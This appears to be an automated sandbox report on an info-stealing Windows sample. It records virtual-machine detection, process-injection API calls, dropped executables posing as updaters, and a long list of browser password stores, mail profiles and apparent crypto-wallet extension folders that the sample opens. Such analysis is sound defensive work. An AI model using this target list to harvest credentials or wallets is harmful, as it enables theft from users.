Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.3304673570.000000000610E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!w
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.4444174900.00000000013FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:D
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B6E2A2 rdtsc 0_2_00B6E2A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread, 0_2_0098C630
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984130 mov eax, dword ptr fs:[00000030h] 0_2_00984130

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread, 0_2_0098C630
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F360D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_008F360D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06F0C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_06F0C990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2113636991.00000000062C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\UhOL8vG3NSxPpn1EjM9IIxV.zip, type: DROPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000000.00000003.2113636991.00000000062C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\UhOL8vG3NSxPpn1EjM9IIxV.zip, type: DROPPED